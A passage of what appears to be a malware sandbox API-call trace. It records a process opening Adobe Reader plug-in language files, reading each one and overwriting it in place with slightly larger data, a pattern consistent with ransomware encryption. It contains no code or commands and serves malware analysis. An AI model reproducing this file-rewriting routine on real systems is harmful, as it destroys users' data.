lpMultiByteStr="Flash.KOR", lpUsedDefaultChar=0x0) returned 9 [0082.717] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2b1f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0082.719] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0082.719] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0082.719] CloseHandle (hObject=0x1e4) returned 1 [0082.719] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0082.720] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.720] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1a00 [0082.720] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.720] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.721] ReleaseMutex (hMutex=0x168) returned 1 [0082.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.CHS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0082.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.CHS", cchWideChar=10, lpMultiByteStr=0x1f7346c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MCIMPP.CHS", lpUsedDefaultChar=0x0) returned 10 [0082.721] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2b1f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0082.723] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0082.723] WriteFile (in: hFile=0x1e4, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0082.723] CloseHandle (hObject=0x1e4) returned 1 [0082.723] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0082.725] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.725] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1c00 [0082.725] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.725] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.725] ReleaseMutex (hMutex=0x168) returned 1 [0082.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.JPN", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0082.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.JPN", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mcimpp.JPN", lpUsedDefaultChar=0x0) returned 10 [0082.725] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2b1f2bc*=0x1c00, lpOverlapped=0x0) returned 1 [0082.727] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0082.728] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea76b8*, nNumberOfBytesToWrite=0x2188, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea76b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x2188, lpOverlapped=0x0) returned 1 [0082.728] CloseHandle (hObject=0x1e4) returned 1 [0082.728] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0082.729] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.729] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xa00 [0082.729] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.729] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.730] ReleaseMutex (hMutex=0x168) returned 1 [0082.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.CAT", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.CAT", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.CAT", lpUsedDefaultChar=0x0) returned 13 [0082.730] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2b1f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0082.732] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0082.733] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0082.734] CloseHandle (hObject=0x1e4) returned 1 [0082.734] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0082.735] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.735] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xa00 [0082.735] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.735] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.735] ReleaseMutex (hMutex=0x168) returned 1 [0082.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.ITA", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.ITA", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.ITA", lpUsedDefaultChar=0x0) returned 13 [0082.735] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2b1f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0083.189] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0083.189] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0083.220] CloseHandle (hObject=0x1e4) returned 1 [0083.220] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0083.228] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.228] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xa00 [0083.228] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.228] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.228] ReleaseMutex (hMutex=0x168) returned 1 [0083.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.SVE", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.SVE", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.SVE", lpUsedDefaultChar=0x0) returned 13 [0083.234] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2b1f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0083.236] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0083.236] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0083.236] CloseHandle (hObject=0x1e4) returned 1 [0083.236] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0083.237] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.237] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xa00 [0083.237] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.237] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.238] ReleaseMutex (hMutex=0x168) returned 1 [0083.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.FRA", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0083.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.FRA", cchWideChar=16, lpMultiByteStr=0x1f88a64, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.FRA", lpUsedDefaultChar=0x0) returned 16 [0083.238] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2b1f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0083.240] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0083.240] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0083.240] CloseHandle (hObject=0x1e4) returned 1 [0083.240] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0083.241] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.241] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xa00 [0083.241] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.241] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.241] ReleaseMutex (hMutex=0x168) returned 1 [0083.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.SUO", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0083.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.SUO", cchWideChar=16, lpMultiByteStr=0x1f88a64, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.SUO", lpUsedDefaultChar=0x0) returned 16 [0083.241] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2b1f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0083.243] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0083.243] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0083.244] CloseHandle (hObject=0x1e4) returned 1 [0083.244] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\QuickTime.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\quicktime.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0083.244] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.245] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xa00 [0083.245] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.245] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.245] ReleaseMutex (hMutex=0x168) returned 1 [0083.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.HRV", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.HRV", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.HRV", lpUsedDefaultChar=0x0) returned 13 [0083.245] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2b1f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0083.247] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0083.247] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0083.247] CloseHandle (hObject=0x1e4) returned 1 [0083.248] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_POL\\QuickTime.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_pol\\quicktime.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0083.248] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.249] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xa00 [0083.249] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.249] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.249] ReleaseMutex (hMutex=0x168) returned 1 [0083.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.POL", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.POL", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.POL", lpUsedDefaultChar=0x0) returned 13 [0083.249] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2b1f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0083.251] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0083.251] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0083.252] CloseHandle (hObject=0x1e4) returned 1 [0083.252] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUS\\QuickTime.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rus\\quicktime.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0083.253] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.253] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xa00 [0083.253] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.253] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.253] ReleaseMutex (hMutex=0x168) returned 1 [0083.253] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.RUS", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.253] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.RUS", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.RUS", lpUsedDefaultChar=0x0) returned 13 [0083.254] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2b1f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0083.256] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0083.256] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0083.256] CloseHandle (hObject=0x1e4) returned 1 [0083.256] 